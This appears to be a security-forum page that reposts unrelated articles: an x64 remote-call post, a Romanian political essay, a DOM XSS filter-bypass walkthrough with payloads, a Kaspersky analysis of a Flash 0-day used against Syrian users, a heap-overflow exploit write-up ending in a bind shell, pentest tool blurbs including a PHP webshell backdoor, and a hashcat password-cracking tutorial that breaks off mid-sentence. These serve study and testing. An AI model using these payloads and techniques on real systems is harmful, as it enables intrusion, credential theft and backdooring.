Nytro

[h=1]An Experiment In Performing Remote Calls on x64[/h] Posted on May 4, 2014 by admin Recently I was trying to do something more than just executing code in the context of a remote process: I wanted to call a function remotely, including supplying arguments, and have the program continue execution afterwards. What I will present in this post is what I have quickly come up with to achieve the task. There certainly are edge cases (discussed at the end) where the code will run into issues, but the general logic of it is Suspend all threads in the target process. This is achieved in the code with a call to the NtSuspendProcess native API. Allocate space in the process that will contain the x64 assembly code which will set up the parameters and stack to perform the call. Save all registers that will be used in performing the call. The example code does not save flags, but a full implementation will want to do that as well. Write in the parameters following the Windows x64 ABI (first four parameters in RCX, RDX, R8, and R9) respectively, with the rest on the stack. The caller will have to know and supply the stack offset to the other parameters. Set up the trampoline to perform the call. Resume the process via NtResumeProcess and let the call happen. Save the result of the call and continue execution. Articol: An Experiment In Performing Remote Calls on x64 | RCE Endeavors

Mic? antologie a patriotismului am?rât Andrei Ple?u Am publicat ?i cu alte prilejuri textele de mai jos. Simt nevoia s? le reamintesc cititorilor, într-un moment în care trîmbi?ele unui patriotism rudimentar, l?ut?resc, ?îfnos, au reaprins spiritele. Patriotismul a ajuns s? fie un amestec indigest de vorbe l?cr?moase ?i încrunt?turi de grot?. Pentru campionii lui, patria nu trebuie „ajutat?” decît cu lingu?eli ?i jocuri de bicep?i. Ideea c? o po?i iubi cu disperare, întristat de relele care o desfigureaz? (?i care, nu odat?, vin din noi în?ine) e prea subtil? pentru l?tr?torii de parad?, convin?i c? a te gudura servil în poala ??ri?oarei e modul optim de a o sluji, cînd, de fapt, e un soi de r?zgîi mai curînd dezonorant. În general, profesioni?tii retoricii patriotarde sunt, mai curînd, oameni f?r? identitate, incapabili de ispr?vi cu adev?rat ziditoare ?i, tocmai de aceea, dornici s? se salveze identificîndu-se cu str?mo?i mai f?lo?i. Gigi luat în sine nu e nimic. Dar Gigi ca „urma?” al lui ?tefan cel Mare, sau ca veri?or al lui Brâncu?i începe s? cread? c? exist?… Citeste mai mult: adev.ro/n53au0

[h=1]Reverse DOM XSS[/h] by Pedro Laguna on May 4, 2014 I came recently with an idea about how to exploit a DOM XSS vulnerability that it might be worth sharing here so others can use this trick, adapt it and defeat some poor filters with a little of JavaScript and some creativity. During an engagement I found a piece of code similar to this one: <a href="#" onclick="goToWebsite(this, 'url', '/ShowInfo.php?id=[INJECTION]&category=CARS');"> The code behind goToWebsite was something like this: function goToWebsite(e, param, base) { window.location = base + param + "=" + actionURL.value; } It’s a very clear example of DOM XSS where we can control the flow of the page using the window.location element. But why it wasn’t a reflected XSS? Well, they have some filters in place. Double quotes ( ‘”‘ ), brackets ( ‘<’ and ‘>’ ) and even semicolon ( ‘;’ ) where filtered so we couldn’t escape from the injection point, having to dig deeper into the goToWebsite function to find our way into executing arbitrary JavaScript. Lucky for us we were still allowed to use some characters that were necessary for this trick, like parenthesis ( ‘(‘ and ‘)’ ), quotes ( ”’ ) and dots ( ‘.’ ). For a DOM XSS attack we need to modify the address where the window.location is going to navigate and make it go to javascript: URL handler. But, in this case we couldn’t write directly as the injection is happening in the middle of a string, which contains some reference to a relative URL: “/ShowInfo.php?id=“ How do we overcome this problem? Well, we cannot escape from the function call but as we can insert quotes and parenthesis we can modify the string that is received by the goToWebsite function like this: <a href="#" onclick="goToWebsite(this, 'url', '/ShowInfo.php?id='.split('').reverse().join('').concat('&category=CARS');"> These function (split, reverse and join) will reverse the string ‘/ShowInfo.php?id=‘ to be ‘=di?php.ofnIwohS/‘. And we are using concat to make the code valid and as it’s at the end of the result string we don’t care about modifying it. So now we need to insert our payload, the classic alert(1): <a href="#" onclick="goToWebsite(this, 'url', '/ShowInfo.php?id=//)1(trela:tpircsavaj'.split('').reverse().join('').concat('&category=CARS');"> Now, if we execute that code, the resulting string will be: javascript:alert(1)//=di?php.ofnIwohS/&category=CARS Perfe… wait! What’s this? Code is not being executed! We have managed to insert our javascript payload at the beginning of the string passed to window.location but the code is not being executed. A closer look at the generated code on the page revealed the mystery: %2f%2f)1(trela%3Atpircsavaj'.split('').reverse().join('').concat(' Key characters as slash ( ‘/’ ) and colon ( ‘:’ ) were encoded, so our code wasn’t able to executed. Time to think how to bypass the encoding of these characters. JavaScript has the ability to replace a character inside a string like: replace(‘old’, ‘new’) so I thought I could use String.fromCharCode to bypass the character limitations and make my code execute, replacing ‘/’ and ‘:’ by two other characters that are not URLEncoded like ‘~’ and ‘+’ but it was a problem: comma character was also URL encoded so I couldn’t use the replace function. Time for the second trick! Apparently, in JavaScript, you can split a string by a character and then use another character to join the strings together, like this: 'abc-def'.split('-').join('!') After being executed this will render abc!def The best part? We are not using any forbidden characters! Just again our old friends quotes and parenthesis. If we put everything together we have something like this in order to exploit this DOM XSS bug: ~~)1(trela+tpircsavaj'.split('').reverse().join('').split('~').join(String.fromCharCode(47)).split('+').join(String.fromCharCode(58))).concat(' That way I was able to execute JavaScript code in this particular scenario without using any forbidden char. I am pretty sure you will not find yourself in this exact situation in the future but hopefully you can use these two little tricks someday! Sursa: Reverse DOM XSS | Pentura Labs's Blog

New Flash Player 0-day (CVE-2014-0515) used in watering-hole attacks Vyacheslav Zakorzhevsky Kaspersky Lab Expert In mid-April we detected two new SWF exploits. After some detailed analysis it was clear they didn't use any of the vulnerabilities that we already knew about. We sent the exploits off to Adobe and a few days later got confirmation that they did indeed use a 0-day vulnerability that was later labeled as CVE-2014-0515. The vulnerability is located in the Pixel Bender component, designed for video and image processing. We received a sample of the first exploit on April 14, while a sample of the second came on April 16. The first exploit was initially recorded by KSN on April 9, when it was detected by a generic heuristic signature. There were numerous subsequent detections on April 14 and 16. In other words, we succeeded in detecting a previously unknown threat using heuristics. According to KSN data, these exploits were stored as movie.swf and include.swf at an infected site. The only difference between the two pieces of malware is their shellcodes. It should be noted that the second exploit (include.swf) wasn't detected using the same heuristic signature as the first, because it contained a unique shellcode. Each exploit comes as an unpacked flash video file. The Action Script code inside was neither obfuscated nor encrypted. As is usually the case with this kind of exploit, the first stage is a heap spray - preparing the dynamic memory for exploitation of the vulnerability. The exploits are also designed to check the OS version. If Windows 8 is detected, a slightly modified byte-code of the Pixel Bender component is used. A fragment of the vulnerable Pixel Bender code (the data in the red box is changed according to system version) Fragment of the decompiled exploit code Next comes the actual exploitation of the vulnerability, namely modification of one of the indices in the table of methods/virtual functions. Interestingly, both exploits have two shellcodes. The first is similar in both applications; it is quite short and prepares the memory for the successful functioningof the second shellcode. A fragment of the first shellcode debugged in WinDBG Firstly, the current memory is marked as read, write and execute with the API function VirtualProtect, and then additional memory is allocated using VirtualAlloc. The second shellcode is copied to this memory and control is transferred to it. The initialization of API functions and transfer of the control to the second shellcode appear in red boxes in the screenshot above. The exploits' second shellcodes differ significantly. The exploit that we detected first has a standard shellcode (movie.swf). It performs a search of system libraries in the memory, and then downloads and runs the payload. Unfortunately, the link turned out to be inactive at the time of our research. Fragment of the movie.swf exploit's second shellcode responsible for the download and launch of the payload In the other exploit - include.swf - the second shellcode was unusual. It receives the base DLL address for flash10p.ocx, searching it for specific fragments and interacts with the ciscompeaddin5x0 - Cisco MeetingPlace Express Add-In version 5x0. This add-in is used by web-conference participants to view documents and images from presenter's screen. It should be noted that the exploit will not work if the required versions of Adobe Flash Player ActiveX and Cisco MPE are not present on the system. Fragment of the include.swf exploit's second shellcode It appears that part of the information for the exploit include.swf is passed on from outside. According to KSN data, the referer to include.swf points to another SWF file: stream.swf. At the same time, the referer of the first exploit - movie.swf - points to index.php located in the same folder as the exploit (see below). We couldn't establish the exact payload of the exploit include.swf due to a lack of data relayed from the landing page and/or other exploits. We are sure that all these tricks were used in order to carry out malicious activity against a very specific group of users without attracting the attention of security solutions. We believe that the Cisco add-in mentioned above may be used to download/implement the payload as well as to spy directly on the infected computer. Both the exploits detected by us spread from a site located at ???? ??????? ???????? ??????. The site was launched back in 2011 by the Syrian Ministry of Justice and was designed as an online form for citizens to complain about law and order violations. We believe the attack was designed to target Syrian dissidents complaining about the government. The site was hacked in September 2013, something the alleged hacker announced on his twitter account. The link to these exploits is as follows: http://jpic.gov.sy/css/images/_css/***********. When we entered the site, the installed malware payloads were already missing from the "_css" folder. We presume the criminals created a folder whose name doesn't look out of place on an administration resource, and where they loaded the exploits. The victims were probably redirected to the exploits using a frame or a script located at the site. To date, April 28, the number of detections by our products has exceeded 30. They were detected on the computers of seven unique users, all of them in Syria, which is not surprising considering the nature of the site. Interestingly, all the attacked users entered the website using various versions of Mozilla Firefox. It's likely that the attack was carefully planned and that professionals of a pretty high caliber were behind it. The use of professionally written 0-day exploits that were used to infect a single resource testifies to this. Moreover, while the first exploit is pretty standard and can infect practically any unprotected computer, the second exploit (include.swf) only functions properly on computers where Adobe Flash Player 10 ActiveX and Cisco MeetingPlace Express Add-In are installed. The Flash Player Pixel Bender component, which Adobe no longer supports, was used as the attack vector. The authors were counting on the developers not finding a vulnerability in that component and that the exploit would remain active for longer. All this suggests that the attackers were not targeting users en masse. We detect such exploits by AEP technology as PDM:Exploit.Win32.Generic and by heuristics as HEUR:Exploit.SWF.CVE-2014-0515.gen. Sursa: https://www.securelist.com/en/blog/8212/New_Flash_Player_0_day_CVE_2014_0515_used_in_watering_hole_attacks

[h=3]Windows Heap Overflow Exploitation[/h]Hi , In this article I will be talking about exploiting a custom heap : which is a big chunk of memory allocated by the usermode application using VirtualAlloc for example . The application will then work on managing 'heap' block allocations and frees (in the allocated chunk) in a custom way with complete ignorance of the Windows's heap manager. This method gives the software much more control over its custom heap, but it can result in security flaws if the manager doesn't do it's job properly , we'll see that in detail later. To see an implementation of a custom heap manager in C/C++ please refer to my previous blog post : Reverse Engineering 0x4 Fun: Creating and using your own 'heap' manager Heap Manager Source code : [C++] Custom Heap Manager - Pastebin.com The vulnerability that we'll exploit together today is a 'heap' overflow vulnerability that's occuring in a custom heap built by the application. The vulnerable software is : ZipItFast 3.0 and we'll be exploiting it today and gaining code execution under Windows 7 . ASLR , DEP , SafeSEH aren't enabled by default in the application which makes it even more reliable to us . Even though , there's still some painful surprises waiting for us ... Let's just start : The Exploit : I've actually got the POC from exploit-db , you can check it right here : http://www.exploit-db.com/exploits/17512/ Oh , and there's also a full exploit here : http://www.exploit-db.com/exploits/19776/ Unfortunately , you won't learn much from the full exploitation since it will work only on Windows XP SP1. Why ? simply because it's using a technique that consists on overwriting the vectored exception handler node that exists in a static address under windows XP SP1. Briefly , all you have to do is find a pointer to your shellcode (buffer) in the stack. Then take the stack address which points to your pointer and after that substract 0x8 from that address and then perform the overwrite. When an exception is raised , the vectored exception handlers will be dispatched before any handler from the SEH chain, and your shellcode will be called using a CALL DWORD PTR DS: [ESI + 0x8] (ESI = stack pointer to the pointer to your buffer - 0x8). You can google the _VECTORED_EXCEPTION_NODE and check its elements. And why wouldn't this work under later versions of Windows ? Simply because Microsoft got aware of the use of this technique and now EncodePointer is used to encode the pointer to the handler whenever a new handler is created by the application, and then DecodePointer is called to decode the pointer before the handler is invoked. Okay, let's start building our exploit now from scratch. The POC creates a ZIP file with the largest possible file name , let's try it : N.B : If you want to do some tests , execute the software from command line as follows : Cmd :> C:\blabla\ZipItFast\ZipItFast.exe C:\blabla\exploit.zip Then click on the Test button under the program. Let's try executing the POC now : An access violation happens at 0x00401C76 trying to access an invalid pointer (0x41414141) in our case. Let's see the registers : Basically the FreeList used in this software is a circular doubly linked lists similar to Windows's . The circular doubly linked list head is in the .bss section at address 0x00560478 and its flink and blink pointers are pointing to the head (self pointers) when the custom heap manager is initialized by the software. I also didn't check the full implementation of the FreeList and the free/allocate operations in this software to see if they're similar to Windows's (bitmap , block coalescing ...etc). It's crucial also to know that in our case , the block is being unlinked from the FreeList because the manager had a 'request' to allocate a new block , and it was chosen as best block for the allocation. Let's get back to analysing the crash : - First I would like to mention that we'll be calling the pointer to the Freelist Entry struct : "entry". Registers State at 0x00401C76 : EAX = entry->Flink EDX = entry->Blink [EAX] = entry->Flink->Flink [EAX+4] = entry->Flink->Blink (Next Block's Previous block) [EDX] = entry->Blink->Flink [EDX+4] = entry->Blink->Blink (Previous Block's Next block) Logically speaking : Next Block's Previous Block and Previous Block's Next Block are nothing but the current block. So the 2 instructions that do the block unlinking from the FreeList just : - Set the previous freelist entry's flink to the block entry's flink. - Set the next freelist entry's blink to the block entry's blink. By doing so , the block doesn't belong to the freelist anymore and the function simply returns after that. So it'll be easy to guess what's happening here , the software allocates a static 'heap' block to store the name of the file and it would have best to allocate the block based on the filename length from the ZIP header (this could be a fix for the bug , but heap overflows might be found elsewhere , I'll propose a better method to fix ,but not fully, this bug later in this article). Now , we know that we're writing past our heap block and thus overwriting the custom metadata of the next heap block (flink and blink pointers). So, We'll need to find a reliable way to exploit this bug , as the 2 unlinking instructions are the only available to us and we control both EAX and EDX. (if it's not possible in another case you can see if there are other close instructions that might help), you can think of overwriting the return address or the pointer to the structured exception handler as we have a stack that won't be rebased after reboot. This might be a working solution in another case where your buffer is stored in a static memory location. But Under Windows 7 , it's not the case , VirtualAlloc allocates a chunk of memory with a different base in each program run. In addition , even if the address was static , the location of the freed block that we overwrite varies. So in both cases we'll need to find a pointer to our buffer. The best place to look is the stack , remember that the software is trying to unlink (allocate) the block that follows the block where we've written the name , so likely all near pointers in the stack (current and previous stack frame) are poiting to the newly allocated block (pointer to metadata) . That's what we don't want because flink and blink pointers that we might set might not be valid opcodes and might cause exceptions , so all we need to do is try to find a pointer to the first character of the name and then figure out how to use this pointer to gain code execution , this pointer might be in previous stack frames. And here is a pointer pointing to the beginning of our buffer : 3 stack frames away Remember that 0x01FB2464 will certainly be something else when restarting the program , but the pointer 0x0018F554 is always static , even when restarting the machine. So when I was at this stage , I started thinking and thinking about a way that will help me redirect execution to my shellcode which is for sure at the address pointed by 0x0018F554 , and by using only what's available to me : - Controlled registers : EAX and EDX. - Stack pointer to a dynamic buffer pointer. - 2 unlinking instructions. - No stack rebase. Exploiting the vulnerability and gaining code execution: And Then I thought , why wouldn't I corrupt the SEH chain and create a Fake frame ? Because when trying to corrupt an SEH chain there are 3 things that you must know : - SafeSEH and SEHOP are absent. - Have a pointer to an exisiting SEH frame. - Have a pointer to a pointer to the shellcode. The pointer to the shellcode will be treated as the handler,and the value pointed by ((ptr to ptr to shellcode)-0x4) will be treated as the pointer to the next SEH frame. Let's illustrate the act of corrupting the chain : (with a silly illustration , sorry) Let me explain : we need to achieve our goal by using these 2 instructions , right ? : MOV [EDX],EAX MOV [EAX+4], EDX We'll need 2 pointers and we control 2 registers , but which pointer give to which register ? This must not be a random choice because you might overwrite the pointer to the shellcode if you chose EAX as a pointer to your fake SEH frame. So we'll need to do the reverse , but with precaution of overwriting anything critical. In addition we actually don't care about the value of "next SEH frame" of our fake frame. So our main goal is to overwrite the "next SEH frame" pointer of an exisiting frame , to do so we need to have a pointer to our fake frame in one of the 2 registers. As [EAX+4] will overwrite the pointer to the buffer if used as a pointer to the fake SEH frame , we will use EDX instead. We must not also overwrite the original handler pointer because it will be first executed to try to handle the exception , if it fails , then our fake handler (shellcode) will be invoked then. So : EDX = &(pointer to shellcode) - 0x4 = Pointer to Fake "Next SEH frame" element. EDX must reside in the next frame field of the original frame which is : [EAX+4]. And EAX = SEH Frame - 0x4. Original Frame after overwite : Pointer to next SEH : Fake Frame Exception Handler : Valid Handler Fake Frame : Pointer to next SEH : (Original Frame) - 0x4 (we just don't care about this one) Exception Handler : Pointer to shellcode The SEH frame I chose is at : 0x0018F4B4 So : EAX = 0x0018F4B4 - 0x4 = 0x0018F4B0 and EDX =0x0018F554 - 0x4 = 0x0018F550 When the overwrite is done the function will return normally to its caller , and all we have to do now is wait for an exception to occur . An exception will occur after a dozen of instructions as the metadata is badly corrupted. The original handler will be executed but it will fail to handle the access violation and then our fake handler will be called which is the shellcode . Making the exploit work : Now all we need to do is calculate the length between the 1st character of the name and the flink and blink pointers , and then insert our pointers in the POC. Inserting the shellcode : The space between the starting address of the buffer and the heap overwritten metadata is not so large , so it's best to put an unconditional jump at the start of our buffer to jump past the overwritten flink and blink pointers and then put the shellcode just after the pointers. As we can calculate the length , this won't cause any problem. Final exploit here : [Perl] ZipItFast Heap Overflow - Pastebin.com I chose a bind shellcode , which opens a connection to (0.0.0.0:4444). Let's try opening the ZIP file using ZipItFast and then check "netstat -an | find "4444" : Bingo ! A Fix for this vulnerability ?? The method I stated before which consists on allocating the block based on the filename length from the ZIP headers can be valid only to fix the vulnerability in this case , but what if the attackers were also able to cause an overflow elsewhere in the software ? The best way to fix the bug is that : when a block is about to be allocated and it's about to be unlinked from the Freelist the first thing that must be done is checking the validity of the doubly linked list , to do so : safe unlinking must be performed and which was introduced in later versions of Windows. Safe unlinking is done the following way : if ( entry->flink->blink != entry->blink->flink || entry->blink->flink != entry){ //Fail , Freelist corrupted , exit process } else { //Unlink then return the block to the caller } Let's see how safe unlinking is implemented under Windows 7 : The function is that we'll look at is : RtlAllocateHeap exported by ntdll Even if this method looks secure , there is some research published online that provides weaknesses of this technique and how can it be bypassed. I also made sure to implement this technique in my custom heap manager (Line 86) , link above. I hope that you've enjoyed reading this paper . See you again soon , Souhail Hammou. Sursa: Reverse Engineering 0x4 Fun: Windows Heap Overflow Exploitation

[h=1]Let's Write Some X86-64[/h] This a beautiful quote, one that I think truly captures the relationship between higher level languages and the Instruction Set Architecture (ISA)’s machine code, though this is from the angle of controlling the machine with its implementation specific quirks which can detract from what you’re actually trying to do. This blog is meant for those who don’t know x86-64 assembly, but maybe know a little C, and are curious about code generation. Or maybe if you’ve ever tried to hand write x86-64 assembly, and got stuck trying to understand the tooling or seemingly random segfaults from what appears to be valid instructions. Articol: https://nickdesaulniers.github.io/blog/2014/04/18/lets-write-some-x86-64/

[h=2]Volafox Mac OS X Memory Analysis Toolkit[/h]May 4th, 2014 Mourad Ben Lakhoua Volafox is an open source toolkit that you can use for Mac OS X and BSD forensics. The tool is a python based and allows investigating security incidents and finding information for malwares and any malicious program on the system. Security analyst can have the following information using this tool: MAC Kernel version, CPU, and memory specification Mounted filesystems Kernel Extensions listing Process listing Task listing (Finding process hiding) Syscall table (Hooking detection) Mach trap table (Hooking detection) Network socket listing (Hash table) Open files listing by process Show Boot information EFI System Table, EFI Runtime Services Print a hostname Screenshot for volafox (click to enlarge) You can download the tool on the following link: https://code.google.com/p/volafox/ Sursa: Volafox Mac OS X Memory Analysis Toolkit | SecTechno

[h=2]LiME – Linux Memory Extractor[/h]January 19th, 2014 Mourad Ben Lakhoua Mobile platform security tools are increasing and we have more open source tools that allow to conduct forensic analyses on phone devices. if you want to investigate Android operating system you can use LiME. LiME (formerly DMD) allows to investigate file system from memory or over network, this can be used to have a full memory capture to see if there are abnormal process or services that have been used in a previous attack. Working on the system during the analyses is not recommended as this may modify file system so LiME minimizes the interaction between user and kernel space processes during acquisition, which allows it to produce memory dumps that are more forensically sound than those of other tools designed for Linux memory acquisition. To have the memory over TCP tunnel we need to first make the device listen on specified port which we connect from our host. when the host connect to the socket it will automatically start to get the RAM image to the host for analysis. On the host computer, we connect to this port with netcat and redirect output to a file. You can download the tool on the following link: lime-forensics - LiME - Linux Memory Extractor - Google Project Hosting Sursa: LiME – Linux Memory Extractor | SecTechno

[h=2]DSploit Android Toolkit for Security Testing[/h]April 20th, 2014 Mourad Ben Lakhoua dSploit is a very comfortable tool that you can install on Android to run a pentest or network security assessment. The toolkit allows fingerprinting the remote operating systems and identifying different hosts, scans the network for system vulnerabilities and performing MITM to sniff sensitive information such as user’s password. The features included in dSploit are: WiFi Scanning & Common Router Key Cracking Deep Inspection Vulnerability Search Multi Protocol Login Cracker Packet Forging with Wake On Lan Support HTTPS/SSL Support ( SSL Stripping + HTTPS -> Redirection ) MITM Real-time Network Stats MITM Multi Protocol Password Sniffing MITM HTTP/HTTPS Session Hijacking MITM HTTP/HTTPS Hijacked Session File Persistence MITM HTTP/HTTPS Real-time Manipulation MITM module screenshot from dSploit (click to enlarge) The toolkit will help security officer or penetration tester to demonstrate how it is possible to exploit vulnerabilities and take control on targeted systems. The team have officially announced that they have a new nightly builds that you can download over this link: http://update.dsploit.net/nightly

[h=2]Watcher Web passive vulnerability scanner[/h]September 29th, 2013 Mourad Ben Lakhoua Web applications are one of the most targeted systems as they are directly exposed to internet. There is no web server without serious vulnerabilities, it is enough that you open exploit DB where you will find how it is simple to exploit vulnerable CMS or web applications. Hackers are often searching and having those bugs where there is no correct code that may leak some very sensitive information, by the end developers are people and they often conduct some incautious mistakes. Developers mostly looking to have more functionality to increase usability and as you add that functionality you need to add more code which may lead to more vulnerabilities. That’s why you need to conduct penetration testing on periodic bases to detect those bugs. During a pentest you can try Watcher. Watcher is an open source tool that can be a good addition to your penetration testing toolkit. it will passively scan the web applications searching for some serious vulnerabilities in the user input fields. First you start by installing Fiddler a proxy framework to integrate watcher. Next you just open on the browser the website you need to verify where you can find important information by severity if high, medium or low. Online reference for the security issue and how to fix the bug, you can also export the results to an html or xml report. screenshot for Watsher (click to enlarge) Watcher is developed using C# and contain more then 30 checks to perform the vulnerability assessment against your target. this will be as part from your evaluation project and it is extremely fast to find the security issues. You can download the latest release on the following link: Watcher: Web security testing tool and passive vulnerability scanner - Home Sursa: Watcher Web passive vulnerability scanner | SecTechno

[h=2]Weevely 1.1 – PHP Webshell[/h]June 16th, 2013 Mourad Ben Lakhoua Weevely – is a PHP webshell that provides SSH connection to manage website remotely. it can be used as a backdoor system to PoC during a pentest or a web shell to manage legit web accounts. The shell consists of more then 30 modules to automate both administrative and post-operational tasks including: Execute commands and browse remote filesystem, even with PHP security restriction Audit common server misconfigurations Run SQL console pivoting on target machine Proxy your HTTP traffic through target Mount target filesystem to local mount point Simple file transfer from and to target Spawn reverse and direct TCP shells Bruteforce SQL accounts through target system Run port scans from target machine. First of all penetration tester needs to generate the php backdoor file with password of connection. Next upload the weevely.php file to the webserver that is generated by the tool, weevely will automatically detects the best way to execute the commands on targeted system. Weevely communications are hidden in HTTP Cookies and is obfuscated to bypass NIDS signature detection. if you are using Backtrack you can find the tool already integrated under /pentest/web/backdoors/. it is also possible to find it on BackBox. To download and use Weevely make sure to follow this link. Sursa: Weevely 1.1 – PHP Webshell | SecTechno

[h=2]HookME 0.2 – API Spying Tool[/h]April 28th, 2013 Mourad Ben Lakhoua Hooking API calls on operating system allows to intercept useful information, new release of HookMe have been issued to add more stability to the application , a way to choose what API functions to hook and some fixes to the program. HookMe provides a nice graphic user interface allowing you to change the packet content in real time, dropping or forwarding the packet. It also has a python system plugin to extend the HookMe functionality. HookME application interface (click to enlarge) the tool can be a perfectly used in penetration testing for analyzing and modifying network protocols, creating some type of malwares or backdoors for PoC embebed into network protocols. hooking the API calls for sending and receiving network data (even SSL clear data). or to investigate any rootkit that is hooking API calls. You can download the latest version of HookMe over this link: https://code.google.com/p/hookme/ Sursa: HookME 0.2 – API Spying Tool | SecTechno

[h=2]Fino Android Security Assessment Tool[/h]February 2nd, 2014 Mourad Ben Lakhoua Security assessment tools have several ways for conducting the technical analyses. Fino is another program that you can use to run dynamic analyses for Android based application. The tool allows injecting services in the application for controlling and monitoring the change. The android application we want to verify will be running in emulator that is called gadget or what we call usually a sandbox and dynamically verify all changes on the system. Next it is possible to run python scripts to get or modify the services. You may get all target activities by running “activities =app.find(‘android.app.Activity’)“ the idea of monitoring services with the injection can make you monitor the application from inside and you will have details about the android application with more accurate results. Fino design in the slide deck the full pdf file over here: http://events.ccc.de/congress/2012/Fahrplan/attachments/2237_SmallFootprintInspectionAndroid-slides.pdf You can download Fino on the following link: https://github.com/sysdream/fino Sursa: Fino Android Security Assessment Tool | SecTechno

[h=2]Fuzzware 1.5- Fuzzing Tool[/h]March 2nd, 2014 Mourad Ben Lakhoua Fuzzing is a process that is used during a penetration testing to find out if the application is vulnerable, the process come by sending incorrect data to the targeted application in order to cause a failure or an error situation that security analyst will use as a PoC in their report. Fuzzware is a generic fuzzing framework that can be considered for such operation. Fuzzware UI (click to enlarge) Fuzzware allows to make testcases as required: fuzz a file format such as XML file. fuzz network protocol or a network service by sending a predefined network packets. fuzz an interface that you need to test including web services. you can define a custom input that is coming from a code. You can download Fuzzware 1.5 over this link: download Sursa: Fuzzware 1.5- Fuzzing Tool | SecTechno

https://rstforums.com/proiecte/LikePwnerChromeExtension.crx

Cracking MD5, phpBB, MySQL and SHA1 passwords Cracking MD5, phpBB, MySQL and SHA1 passwords with Hashcat, cudaHashcat, oclHashcat on Kali Linux Hashcat or cudaHashcat is the self-proclaimed world’s fastest CPU-based password recovery tool. Versions are available for Linux, OSX, and Windows and can come in CPU-based or GPU-based variants. Hashcat or cudaHashcat currently supports a large range of hashing algorithms, including: Microsoft LM Hashes, MD4, MD5, SHA-family, Unix Crypt formats, MySQL, Cisco PIX, and many others. Contents Cracking MD5, phpBB, MySQL and SHA1 passwords with Hashcat, cudaHashcat, oclHashcat on Kali Linux My Setup NVIDIA Users: AMD Users: [*]Getting hashes: [*]Cracking hashed MD5 passwords MD5 cracking using hashcat and cudahashcat [*]Cracking hashed MD5 – phpBB passwords MD5 – phpBB cracking using hashcat and cudahashcat [*]Cracking hashed MySQL passwords MySQL hashed password cracking using hashcat and cudahashcat [*]Cracking hashed SHA1 passwords SHA1 password cracking using hashcat and cudahashcat [*]Location of Cracked passwords [*]Creating HASH’es using Kali [*]Conclusion [*]Google+ Hashcat or cudaHashcat comes in two main variants: Hashcat – A CPU-based password recovery tool oclHashcat or cudaHashcat – A GPU-accelerated tool Many of the algorithms supported by Hashcat or cudaHashcat can be cracked in a shorter time by using the well-documented GPU-acceleration leveraged in oclHashcat or cudaHashcat (such as MD5, SHA1, and others). However, not all algorithms can be accelerated by leveraging GPUs. Hashcat or cudaHashcat is available for Linux, OSX and Windows. oclHashcat or cudaHashcat is only available for Linux and Windows due to improper implementations in OpenCL on OSX. My Setup My setup is simple. I have a NVIDIA GTX 210 Graphics card in my machine running Kali Linux 1.0.6 and will use rockyou dictionary for this whole exercise. In this post, I will show How to crack few of the most common hashes MD5 MD5 – phpBB MySQL and SHA1 I will use 2 commands for every hash, hashcat and then cudahashcat. Because I am using a NVIDIA GPU, I get to use cudaHashcat. If you’re using AMD GPU, then I guess you’ll be using oclHashcat. Correct me if I am wrong here! Before you enable GPU Cracking, I’ve spent last few months writing guides on how to enable those features in Kali Linux. NVIDIA Users: Install proprietary NVIDIA driver on Kali Linux – NVIDIA Accelerated Linux Graphics Driver Install NVIDIA driver kernel Module CUDA and Pyrit on Kali Linux – CUDA, Pyrit and Cpyrit-cuda AMD Users: Install AMD ATI proprietary fglrx driver in Kali Linux 1.0.6 Install AMD APP SDK in Kali Linux Install Pyrit in Kali Linux Install CAL++ in Kali Linux AMD is currently much faster in terms of GPU cracking, but then again it really depends on your card. You can generate more hashes or collect them and attempt to crack them. Becuase I am using a dictionary, (it’s just 135MB), I am limited to selection number of passwords. The bigger your dictionary is, the more you’ll have success cracking an unknown hash. There are other ways to cracking them without using Dictionary (such as RainBow Tables etc.). I will try to cover and explain as much I can. Advanced users, I’m sure you already know these, so I would appreciate constructive comments. As always, read the manual and help file before you ask for help. Most of the things are covered in manuals and wiki available in www.hashcat.net. A big thanks goes to the Hashcat or cudaHashcat Dev team, they are the ones who created and maintained this so well. Cudos!. Getting hashes: First of all, we need to get our hashes. You can download hash generator applications, but there’s online sites that will allow you to create them. I will use InsidePro who kindly created a page that allows you create hashes on the fly and it’s publicly available. Visit them and feel free to browse their website to understand more about hashes. The password I am using is simple: abc123 All you need to do is enter this in password field of this page Hash Generator and click on generate. Cracking hashed MD5 passwords From the site, I copied the md5 hashed password and put it into a file. vi md5-1.txt cat md5-1.txt MD5 cracking using hashcat and cudahashcat Now it’s simple, I just typed in the following command and it took few seconds. hashcat -m 0 -a 0 /root/md5-1.txt /root/rockyou.txt Similarly, I can use cudahashcat. cudahashcat -m 0 -a 0 /root/md5-1.txt /root/rockyou.txt Cracking hashed MD5 – phpBB passwords From the site, copy the phpBB hashed password and put it into a file. vi md5phpbb-1.txt cat md5phpbb-1.txt What I didn’t explain in previous section, is that how do you know who mode to use or which attack code. You can type in hashcat --help or cudahashcat --help and read through it. Because I will stick with attack mode 0 (Straight Attack Mode), I just need to adjust the value for -m where you specify which type of hash is that. hashcat --help | grep php So it’s 400 MD5 – phpBB cracking using hashcat and cudahashcat Let’s adjust our command and run it. hashcat -m 400 -a 0 /root/md5phpbb-1.txt /root/rockyou.txt and cudahashcat cudahashcat -m 400 -a 0 /root/md5phpbb-1.txt /root/rockyou.txt Cracking hashed MySQL passwords Similar step, we get the file from the website and stick that into a file. vi mysql-1.txt cat mysql-1.txt NOTE: *6691484EA6B50DDDE1926A220DA01FA9E575C18A <– this was the hash from the website, remove * from this one before you save this hash. First of all let’s find out the mode we need to use for MYSQL password hashes. hashcat --help | grep My Ah, I’m not sure which one to use here … MySQL hashed password cracking using hashcat and cudahashcat I’ll try 200 and see how that goes … hashcat -m 200 -a 0 /root/mysql-1.txt /root/rockyou.txt Nope not good, Let’s try 300 this time… hashcat -m 300 -a 0 /root/mysql-1.txt /root/rockyou.txt and cudahashcat cudahashcat -m 300 -a 0 /root/mysql-1.txt /root/rockyou.txt Cracking hashed SHA1 passwords Similar step, we get the file from the website and stick that into a file. vi sha1-1.txt cat sha1-1.txt Let’s find out the mode we need to use for SHA1 password hashes. hashcat --help | grep SHA1 SHA1 password cracking using hashcat and cudahashcat We already know what to do next… hashcat -m 100 -a 0 /root/sha1-1.txt /root/rockyou.txt and cudahashcat cudahashcat -m 100 -a 0 /root/sha1-1.txt /root/rockyou.txt Location of Cracked passwords Hashcat or cudaHashcat saves all recovered passwords in a file. It will be in the same directory you’ve ran Hashcat or cudaHashcat or oclHashcat. In my case, I’ve ran all command from my home directory which is /root directory. cat hashcat.pot Creating HASH’es using Kali As always, great feedback from zimmaro, Thanks. See his comment below: (I’ve removed IP and email details for 